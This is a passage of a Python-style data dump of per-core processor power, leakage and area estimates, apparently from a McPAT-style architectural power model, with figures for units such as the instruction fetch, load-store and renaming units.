'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.619677,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.355402,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.33293,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.353722,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.57023,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0129726,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0938103,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.09594,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0938142,
'Execution Unit/Register Files/Runtime Dynamic': 0.108913,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.226686,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.582618,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.63254,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00404391,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00404391,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00354112,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00138115,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00137819,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0130071,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0380981,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0922296,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.86659,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.347548,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.313253,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.37418,
'Instruction Fetch Unit/Runtime Dynamic': 0.804136,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0708991,
'L2/Runtime Dynamic': 0.0156825,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.03428,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.36645,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0904947,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0904948,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.46335,
'Load Store Unit/Runtime Dynamic': 1.90323,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.223144,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.446289,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0791947,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0799696,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.364763,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0578344,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.660174,
'Memory Management Unit/Runtime Dynamic': 0.137804,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 23.7005,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.3648e-05,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0182989,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.185277,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.20359,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.69698,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.101894,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.164351,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0829587,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.349203,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.116537,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.05081,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00427388,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0309057,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.031608,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0309057,
'Execution Unit/Register Files/Runtime Dynamic': 0.0358818,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0651096,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.189802,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.18295,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000536579,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000536579,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000471689,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000184966,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000454051,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0019989,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00499,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0303855,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.93278,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0594428,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.103203,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.2451,
'Instruction Fetch Unit/Runtime Dynamic': 0.20002,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0383886,
'L2/Runtime Dynamic': 0.00921591,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.42306,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.58336,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.038368,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0383679,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.60424,
'Load Store Unit/Runtime Dynamic': 0.810945,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0946089,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.189218,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.033577,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0341529,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.120173,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00974654,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.333961,
'Memory Management Unit/Runtime Dynamic': 0.0438995,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.862,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00459716,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0536725,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0582697,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.3053,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.00403571,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.205858,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0197495,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0947392,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
